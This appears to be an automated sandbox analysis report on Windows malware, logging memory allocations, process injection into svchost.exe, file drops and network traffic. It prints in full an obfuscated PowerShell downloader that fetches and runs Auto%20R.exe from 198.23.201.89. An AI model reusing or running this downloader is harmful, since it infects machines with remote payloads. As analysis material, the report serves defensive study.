heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file C:\Users\test22\AppData\Roaming\Auto%20R.exe
file C:\Users\test22\AppData\Local\directory\.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.vbs
file C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAllBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQg){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822))) -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZqPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYxTCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,36760,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYKXZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};function SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;foreach($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRXAINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.exe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,36772,36761,36761,36763,36771,36770,36760,36764,36765,36760,36764,36762,36763,36760,36770,36771,36761,36833,36811,36828,36823,36761,36779,36831,36830,36825,36751,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rPdsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;
cmdline powershell.exe -ExecutionPolicy UnRestricted function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAllBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQg){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822))) -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZqPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYxTCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,36760,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYKXZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};function SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;foreach($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRXAINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.exe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,36772,36761,36761,36763,36771,36770,36760,36764,36765,36760,36764,36762,36763,36760,36770,36771,36761,36833,36811,36828,36823,36761,36779,36831,36830,36825,36751,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rPdsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;
file C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file C:\Users\test22\AppData\Local\directory\.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAllBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQg){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822))) -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZqPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYxTCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,36760,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYKXZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};function SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;foreach($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRXAINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.exe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,36772,36761,36761,36763,36771,36770,36760,36764,36765,36760,36764,36762,36763,36760,36770,36771,36761,36833,36811,36828,36823,36761,36779,36831,36830,36825,36751,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rPdsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1540
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received j"Yf9„‹—„Ûtf2ۄÛtœë`€ûtÏ3ÀMàf‰„uÔßÿÿ…ÔßÿÿPèA‹MôEàPè9Màè3ö2ÿ‰uø‹uW‹Îèí<j Y·f;Át j Yf;Á…<ÿÿÿGëÞ³‰uðé2ÿÿÿ…öt@„ÛuF3ÀMàf‰„uÔßÿÿ…ÔßÿÿPè—@‹MôEàPè΍Màè¦_^[‹å]ÂGéÈþÿÿ„ÿu¼„Ûté붋UðNÿéæ–U‹ì‹;Q}B‰‹A‹Mÿ4è¨B°]‹MhùHè>2ÀëëÌÌÌÌÌÌÌÌÌÌS‹ÙW3ÿ9{vTVd$‹s‹4¾…öt‹F ÿ‹F ƒ8t$VèуċCǸG;{rÐÇC^_[Ãÿ6èúÐÿv èòЃÄëȉ{ëäU‹ìV‹ñ‹F 9Fu/ jX;Ès_W3ɉF jZ÷âÁ÷Ù ÈQèBЃ~‹øYuB‰~_jè.ЋÐY…ÒtQ‹E‹‰ ‹H‰J‹H‰J‹@ ‰B ÿ‹N‹F‰ˆÿF^]‹Á띋F…Àt·ÁàPÿvWèmÐÿvèQЃÄë3ÒëÆV‹ñÇhùHèîþÿÿÿvè2ÐY^Ã=iLt(V¡ iL¹iL‹0è%…ötQ‹Îèƒ=iLuÚ^ÃU‹ìQSVWj‹ÙèwÏ‹øY…ÿt=Oè97‹uO‹Æ‰}üÁà„ÃPèþ@Eü‰7P‹Œèã_^[‹å]Â3ÿëÇV¾DjL‹…Éu/ƒÆþ`rL|ïh0jLh,jLè&h<jLh8jLè^é;ÿÿÿQèƒåƒ&ëÆU‹ìƒäøìÌ€=ˆbLV‹ñ„×hL$ è?:€=‡bL„™”3Àf‰D$D$PL$ èÓ;€=…bLL$…”ƒ~`…‘hÐbLè;h´„$ jPèŽî¡¬bLL$$‹T$ƒÄ 3öDŽ$¨F‰„$‰´$ h€Ç„$(èkYD$P„$4PèîYY„$PVÿ¼ôHL$èd^‹å]ÍF\Pè™?ékÿÿÿU‹ìV‹u W‹}ƒ?…”ƒ'_Æ^]ƒ  hLÿ3Àƒ ¤hLÿ¹¬hLVWh¼ùH£hLÇ”hLf£˜hLÆšhLÇœhL £¨hLèÂ<h ùH¹¼hLè³<¹ÌhLè/5¹ÜhLè%5¹ìhLè5¡¬hL¾4iL£ühL¡°hL£iL¡´hL£iL¡¸hL£iLj_ÿ¡¼hL£ iL¡ÀhL£iL¡ÄhL£iL¡ÈhL£iLÿ3À£iL£ iL£$iL¢0iL‹Îè¢4ƒÆOyóƒ drLÿ3À_f£$jL£(jL£,jL¢0jL£4jL£8jL¢<jL£@jL£`rL¸hL^ÃVWèVýÿÿj¾$jL_ƒî‹ÎèáOyó¡ iL…À…»’¹ iLèǹühLè½¹ìhLè³¹ÜhL詹ÌhL蟹¼hLè•_¹¬hL^é‰U‹ìƒäøì¼SVWh´3ÛÇD$¨D$‹ñSPèìƒÄ 9ž˜u ¡ÄbL‰†˜9ž¤u¡ÈbL‰†¤‰†¨9ž°u ¡ÌbL‰†°ž S¾œWè¸ýÿÿ¡¬bL3ɉD$ÇD$ÇD$ÇD$ ‰L$$9N@…Ø‘‹†˜‰D$$‰€=ˆbLD$PtQÿ¼ôHƈbL‹ÎèSüÿÿ_^[‹å]Ãjÿ¼ôHëèU‹ìì¸€=ˆbLtP3Àh´P¢ˆbL‰œ…LüÿÿPè$롬bLƒÄ ‰…Lüÿÿ…HüÿÿDžHüÿÿ¨DžPüÿÿPjÿ¼ôH‹å]ÃU‹ììÀÿM SVW‹ñ…‚h´…HüÿÿDžDüÿÿ¨jPè»êƒÄ ‹Îèžûÿÿ‹}3ÛC€=ˆbLt5€=‡bL‰½Hüÿÿ‰LüÿÿDžPüÿÿ…~ …ÿ8ž”t SWÿ ÷HjhîSWÿ÷H_^[‹å] Ɔ”éېU‹ìƒì<SVWj,EÈÇEÄ0jP‹ùè"ê‹EƒÄ ‹Ð 3ö‰Müj[jZ-…ǐj@^jõ‹ÏèCúÿÿ…w …o‘_^[‹å]ÂU‹ìV‹uW‹ù…ötFÿPRWè—üƒÄ 3Àf‰Dwþ_^]ÃV‹ñNèôVèöÉY‹Æ^ÂVW‹ù‹GP‹pèßÉÿ‰wY…öu!w_^ÃU‹ìVj‹ñèLÉ‹UY‹È‹ƒa‰ƒ~u ‰Nÿ‰N^]‹F‰HëîU‹ì‹E V‹u¯ÆW‹}øë+} ‹ÏÿUNyõ_^]ÂU‹ìƒìXSV‹ñ‰UøWMØè¸0M¨è°0MÈè¨0M¸è 0‹Mè‰Eè‹F‰Eì‹F‰Eð‹F hÀúH‰Eôÿèâ6ƒËÿMÈ;Ä ‘pSVEèPèB2SVMèè7h€ûHMÈè¯6‹ð;ótSVEÈPM¸è2SVMÈèî6‹]ì3öƒûv8VMèèo3j\_f98„T‘jMèè‹3fƒ8:uj_WVEèPMØèÍ1‹÷jÿVEèPM¨è¼1‹Eø…Àt MØQ‹Èè¦9‹M…Ét E¨Pè–9‹M …Éu6‹M…Éu:Mèè=M¸è5MÈè-M¨è%MØè_^[‹å]ÍEÈPèP9뿍E¸PèE9ë»U‹ì¸èÓVhÿ…ðÿþÿ‹ñPjÿ¨ñH…ðÿþÿPMðèª6‹ÖMðè Mðè»^‹å]ÃU‹ì¸èÕÒVj…ÿÿ‹òPhÿÿ1ÿ`óH‹Î…Àt…ÿÿPèF4hÀúH‹Îè”/^‹å]Ãèð5ëèU‹ìQ‹EVW‹=xbLƒøÿ…,‘jj^VVjjcWÿD÷H_^‹å]ÃU‹ìƒäø¡(tLƒì €xVW„²‹EL$3ÿ£xbL3ö‰=|bLF‰=pbL‰|$‰|$‰t$‰|$‰|$ ‰t$$èžPD$ÇD$‰D$ÿd÷Hh¼E£°bLèìYVèfìY‹ ,tLè¡ÿuèŠñÿÿ¡,tLjÿpWh ÿ@÷H‹5|bLL$è9PL$è0P‹Æ_^‹å]Â3À@ëó¡,tL…ÀtPè^ÆYÃVj èÞÅ‹ðY…ötèp‰5,tL¸,tL^Ã3öëïU‹ìƒì SVÿ4÷H‹]‹ð;Þ…13À@^[‹å]ÂU‹ìQSW3ۍEüSPSh ‹ù‰]üÿ@÷H‹EüjSSh ‰Gÿ@÷H_[‹å]ádbL¨uƒÈh¸·C£dbLèÑäY¸ tLÃV‹5(tL…ötN è›VèÅY^ÃVj<èÅ‹ðY…ötè®ÿÿÿQ‹Îè£(tL¸(tL^Ã3ÀëðU‹ììTSV‹ñW~ ‹Ïè±,…¬þÿÿÆF8PDž¬þÿÿÿŒñH‹…°þÿÿ‹Ï‰‹…´þÿÿ‰F‹…¸þÿÿ‰F…ÀþÿÿPèÓ13À9G‡ƒÈÿ‹Ïƒøÿ…þPjè3hìúH‹Ïè-‹3Éf‰N3‰N‰N ‰N$‰N
Data received (‰N,f‰N0ˆN2j[ƒè„ݐH…‹Fˆ^ˆ^…À„K;Ä^ƒø…ˆ^'ˆ^%ˆ^!ˆ^)8]Æ…aˆ^(Eü‰MüPÿ`òHPÿñH9]üuˆ^4ƒeȍ}Ìj3ÀYó«8F4ti!EðMð!Eøèg„ÀtKMðè[„À‹Eøt5MÈQÿЃ}ðt ÿuðÿ˜ñHf‹EÈf‰F6‹Æ_^[‹å]Â‹é Péýþÿÿ¸R·CëčEÈPÿ”ñH뾍EÈPÿ”ñHëÁV‹ñƒ~u hûHÿœñH‰…ÀthûHPÿ ñH‰F3À9F^•ÀÃU‹ìƒì ƒeôƒeüV‹ñMô賄ÀtMô规À‹Eütÿ6ÿЃ}ô^t ÿuôÿ˜ñH‹å]øR·CëáU‹ìƒì V‹ñ3ÀMô‰Eô‰Eü‰è3„ÀtMôè'„À‹EütVÿЃ}ôt ÿuôÿ˜ñH‹Æ^‹å]øR·CëàV‹ñƒ~u hûHÿœñH‰…ÀthpKPÿ ñH‰F3À9F^•ÀÃV‹ñƒ~u hûHÿœñH‰…Àth pKPÿ ñH‰F3À9F^•ÀÃÌÌÌÌÌÌÌÌÌU‹ìƒì(SVWh‹ÙèƒčMìPè3Ò¶‚8SJˆDض‚@SJˆDàBƒú|äjEèh¨=LPèaÂƒÄ ƒ{ …µÿ3‹Ëèò‹ð‰E›€{…á¹ÿ3Qjÿuì‹Ëè ‰Eøƒø|cxì3҅ÿ~0‹uìƒÆ3À덤$ŠLØ:Lþt2ƒø„=ŽBF;×|܋Eø‹u€{u$jƒÆì‹Ëjìÿ3ð‰uè‹넊LÙ:Lÿt-@ëÁ¾Mìè›_‹Æ^[‹å]€}‹Ët8èûé9ÿÿÿŠLÚ: tƒÀ뉊LÛ:Lu*ŠLÜ:L„¦ƒÀéiÿÿÿèL
Data sent GET /warm/Auto%20R.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2572
thread_handle: 0x0000013c
process_identifier: 2568
current_directory:
filepath: C:\Windows\System32\svchost.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Auto%20R.exe"
filepath_r: C:\Windows\System32\svchost.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000134
1 1 0
host 198.23.201.89
file C:\Users\test22\AppData\Local\directory\.exe
count 2072 name heapspray process powershell.exe total_mb 129 length 65536 protection PAGE_READWRITE
Time & API Arguments Status Return Repeated

send

 buffer: GET /warm/Auto%20R.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive
socket: 1436
sent: 80
1 80 0
Process injection Process 2456 called NtSetContextThread to modify thread in remote process 2568
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 3013908
registers.edi: 0
registers.eax: 4199888
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000013c
process_identifier: 2568
1 0 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\Auto%20R.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\Auto%20R.exe"
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
file C:\Users\test22\AppData\Roaming\Auto%20R.exe